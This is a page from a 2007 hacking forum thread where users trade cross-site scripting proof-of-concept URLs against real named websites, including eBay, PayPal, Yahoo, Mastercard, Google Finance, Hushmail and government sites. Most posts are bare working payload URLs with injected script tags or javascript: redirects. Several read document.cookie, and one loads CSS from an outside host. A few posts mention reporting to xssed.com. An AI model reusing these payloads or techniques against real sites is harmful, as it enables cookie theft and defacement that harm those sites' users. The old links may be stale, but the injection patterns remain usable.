Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Pages: PreviousFirst...4950515253545556575859...LastNext
Current Page: 54 of 65
Re: So it begins
Posted by: Anonymous User
Date: November 03, 2007 08:34AM

Wow that one rocks even more! nice work!

Options: ReplyQuote
Re: So it begins
Date: November 03, 2007 03:53PM

http://www.census.gov/cgi-bin/gazetteer?city=<script>alert("Utterly Useless");</script>
I got bored. Really bored.


Awesome AnDrEw - That's The Sound Of Your Brain Crackin'
http://www.awesomeandrew.net/

Options: ReplyQuote
Re: So it begins
Date: November 03, 2007 04:08PM

http://www.ice.gov/exec/whereis/?qu=<script>document.title="Bored";</script>


Awesome AnDrEw - That's The Sound Of Your Brain Crackin'
http://www.awesomeandrew.net/

Options: ReplyQuote
Re: So it begins
Posted by: tehryan
Date: November 03, 2007 08:51PM

http://www.w4ck1ng.com/denied.php

Spits back an unsanitized user-agent, could be hit with forced forging of headers. Which begs the question, how many methods do we all know for forcing forged headers other than the old flash vector?

Also, why are we still trusting $_SERVER[]? :S

Options: ReplyQuote
Re: So it begins
Posted by: nemessis
Date: November 04, 2007 06:58AM

Not so dangerous but...

hxxp://answercenter.ebay.com/doRedirect.jspa?url=javascript:alert('Nemessis-WWW.RSTZONE.ORG-Firefox-Only')

(It works only with Firefox)



Edited 1 time(s). Last edit at 11/04/2007 07:00AM by nemessis.

Options: ReplyQuote
Re: So it begins
Posted by: nemessis
Date: November 04, 2007 09:14AM

PayPal.com

knowledge.paypal.com/paypal/documentDisplay.do?clusterName=PaypalCluster&preview=1&groupId=1&page=http://knowledge.paypal.com/paypal/solution.jsp?id="><script>alert(/Nemessis-WWW.RSTZONE.ORG/)</script>&docType=1006&resultType=5002&docProp=$solution_id&docPropValue=vs3422

Options: ReplyQuote
Re: So it begins
Posted by: Fugitif
Date: November 04, 2007 01:17PM

very nice,few days ago I have sent one to xssed.com and now I have others two, always in paypal.

Options: ReplyQuote
Re: So it begins
Posted by: nemessis
Date: November 04, 2007 05:51PM

They still have old pages with some issues but I really like how they patch everything very fast.

Options: ReplyQuote
Re: So it begins
Posted by: nemessis
Date: November 05, 2007 09:54PM

Yahoo (Works with IE6)

hxxp://kr.blog.yahoo.com/dudnfkd031/GALLERY/show_image_v2.html?img=javascript:alert(/Nemessis/)

hxxp://cn.widget.yahoo.com/gallery/view.htm?widgetID=237&cate="><script>alert(/Nemessis/)</script>

hxxp://xk.cn.yahoo.com/category.cgi?category="><script>alert(/Nemessis/)</script>

hxxp://captcha.chat.yahoo.com/go/captchat/?img=javascript:alert(/Nemessis/)

Allready submited to xssed.com. Tommorow I will post an entire Yahoo! subdomain full of cross site scripting vulnerabilities.

Options: ReplyQuote
Re: So it begins
Posted by: Fugitif
Date: November 06, 2007 11:39AM

Mastercard

http://www.mastercard.com/us/personal/en/cardholderservices/securecode/shop_online_results.html?letter=%22%3E%3Cscript%3Ealert(%22XSS%20by%20Fugitif%22)%3C/script%3E


http://www.mastercardbrandcenter.com/mcbrand/us/getourbrand.do?pageId=dl_1210&expertVisible="><script>alert("XSS by Fugitif")</script>

Options: ReplyQuote
Re: So it begins
Posted by: Fugitif
Date: November 06, 2007 02:47PM

http://www.cyberdefender.com/phishing_alerts.html

they speaks of phishing attack and scam ? LOL

and is more velnerable of others

1

http://support.cyberdefender.com/cgi-bin/support/kb.cgi?view="><script>alert(/XSS by Fugitif/)</script>

2

http://www.cyber-defender.com/EDC/download/1/?affl=cdsite_edc&campaign_code="><script>alert(/XSS by Fugitif/)</script>

and 3


http://support.cyberdefender.com/cgi-bin/support/kb.cgi?view=160&lang='

Options: ReplyQuote
Re: So it begins
Posted by: kirke
Date: November 11, 2007 06:57AM

http://www.cyberdefender.com/phishing_alerts.html?email=a%22%3E<p>%3Cimg%20src=%22//ha.ckers.org/images/stallowned.jpg

Options: ReplyQuote
Re: So it begins
Posted by: zwerg
Date: November 12, 2007 09:27PM

It only takes a couple of minutes to find ... and a lack of input validation.

http://www.lowes.com/lowes/lkn?action=productList&N=0&Ntk=i_products&Ntt=<script>alert('xss')</script>

Options: ReplyQuote
Re: So it begins
Posted by: nav
Date: November 16, 2007 04:29PM

wanna buy something?

[www.futureshop.ca]



Edited 1 time(s). Last edit at 11/16/2007 04:30PM by nav.

Options: ReplyQuote
Re: So it begins
Posted by: digi7al64
Date: November 16, 2007 11:48PM

http://search.chacha.com/search/query?query=%22%3E%3Cscript%3Ealert('xss');%3C/script%3E&mode=web&wsid=UK
sadly they filter out all dangerous characters from the search textbox when focus is lost...but they allow you to enter them directly via the url.

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

Options: ReplyQuote
Re: So it begins
Posted by: Gareth Heyes
Date: November 20, 2007 06:12PM

Based on my current blog post XCSS injection :)
http://www.csszengarden.com/?cssfile=//businessinfo.co.uk/labs/xcss/xcss.css

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: So it begins
Posted by: tx
Date: November 21, 2007 02:36AM

http://www.broadcaster.com/video/search.php?s=dance%20%22%3E%3Cscript%3Ealert%28/xss/%29%3C/script%3E%3C%21%5B
http://www.broadcaster.com/members/search/?s=<script>alert('xss')</script>&category=vodcast&db=weird&search=videos&section=mobile_vod

-tx @ lowtech-labs.org

Options: ReplyQuote
Re: So it begins
Posted by: apnovi
Date: November 22, 2007 05:01AM

C.O.M.O.D.O - Creating trust online

Sent an email to Comodo telling them they have XSS on there site, responce

----------------------------------------------------------------------------
Hi,

Sorry for the inconvenience caused.

Now You can download the latest release 3.0.13.268 from http://personalfirewall.comodo.com and uninstall the existing, restart the computer and install the latest.

It will fix your issue.

For more info, Please do refer our forum..
http://forums.comodo.com/feedbackcommentsannouncementsnews/comodo_ firewall_pro_3_has_been_released-t14915.0.html

--------------------------------------------------------

For some reason they havent realised the problem is with there website, anyway here you go!


http://www.personalfirewall.comodo.com/leak/cpil.html?".'><Script>alert('XSS')</script>"

Options: ReplyQuote
Re: So it begins
Posted by: klaus
Date: November 25, 2007 12:32AM

Any new ones for technorati, delicious or other popular social bookmarking sites?

;)

Options: ReplyQuote
Re: So it begins
Posted by: klaus
Date: November 25, 2007 10:49PM

Here's one: http://vuln.xssed.net/2007/11/21/profiles.friendster.com/

For Friendster ;)

Options: ReplyQuote
Re: So it begins
Posted by: CoLL1eR
Date: November 26, 2007 12:22PM

http://blogpost.imageshack.us/blogpost/postblog_multi.php?back=%3E%22%3E%3Cscript%3Ealert(1)%3C/script%3E">

Options: ReplyQuote
Re: So it begins
Posted by: tx
Date: November 30, 2007 03:10PM

http://blogmarks.net/search/%255C%2522%253E%253Cscript%253Ealert%2528%252Fxss%252F%2529%253C%252Fscript%253E%253C%2521

-tx @ lowtech-labs.org

Options: ReplyQuote
Re: So it begins
Posted by: Fugitif
Date: December 02, 2007 05:04PM

XSS on Google.com

Ok..My XSS alert is here
http://finance.google.com/finance/portfolio?action=add&hash

How you see in the screen we need authentication.



Good,I go inside with my account and now I try to add something on my
Portofolio. I try to add something like this

"><script>alert(/XSS/)</script> OR: like this "><script>alert(
document.cookie)</script> :)



After I have put that string and I press the key "Add to portofolio" we
can see the surprise




That's all,sorry for those screen,I can't show you in other way

Options: ReplyQuote
Re: So it begins
Posted by: Gareth Heyes
Date: December 05, 2007 06:39AM

www.hushmail.com

Geez I thought they'd get basic bloody filtering right! From now on I'm not using another webmail service! Arrrggghhhh the web is a mess.

Sending an email to any Hushmail account with this:-
"></tr><script>alert(/XSS/)</script>

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: So it begins
Posted by: w0ts0n
Date: December 05, 2007 08:15AM

Gareth Heyes Wrote:
-------------------------------------------------------
> www.hushmail.com
>
> Geez I thought they'd get basic bloody filtering
> right! From now on I'm not using another webmail
> service! Arrrggghhhh the web is a mess.
>
> Sending an email to any Hushmail account with
> this:-
> ">alert(/XSS/)

Wow that was is really bad... This is.. just hushmail right?

Options: ReplyQuote
Re: So it begins
Posted by: Gareth Heyes
Date: December 05, 2007 12:10PM

Yeah just Hushmail, I was quite shocked that their security is so bad. I'm never using the service again and they even require you to use Javascript so there's no workaround. I just can't see how it can be a mistake, I mean really what were they thinking?

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: So it begins
Posted by: tx
Date: December 05, 2007 08:20PM

http://restore.holonyx.com/index.php?option=com_content&view=article&id=25"><script>alert('xss')</script>]!><![&Itemid=28

-tx @ lowtech-labs.org

Options: ReplyQuote
Re: So it begins
Posted by: Anonymous User
Date: December 06, 2007 01:01AM

Hushmail has more issues regarding flawed encryption, I read it a week ago someplace.

Options: ReplyQuote
Re: So it begins
Posted by: WhiteAcid
Date: December 06, 2007 02:25AM

hushmail has simply lost all credibility. Release/warez groups are better off sending off their public keys in their .nfo files.

Of course then there's the issue of setting up a CA when pretty much no one, including the CA can be trusted. Now how's that for an oxymoron.

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

Options: ReplyQuote
Re: So it begins
Posted by: Fugitif
Date: December 06, 2007 02:55PM

I am still Fugitif and now I want to show you how can work one vulnerable XSS Alert Bug on Ebay.com.
To be more precise our link now is http://togo.ebay.com

Ok..My XSS alert can be found here http://togo.ebay.com/affiliates/create/



I go to select one version and I crush above



and immediately later click "I WANT THIS ONE"


In the square where asks FOR "ID" I put some string like this "><script>alert(document.cookie)</script> ( or nothing we go directly on the "Browse" )



and click "Browse"




Now we cannot do anything else other than to use the search with our magic string

"><script>alert(document.cookie)</script>

Result ? !




That's all (sorry another time for the screen... coz only so I can have shown)


/Fugitif

Options: ReplyQuote
Pages: PreviousFirst...4950515253545556575859...LastNext
Current Page: 54 of 65


Sorry, only registered users may post in this forum.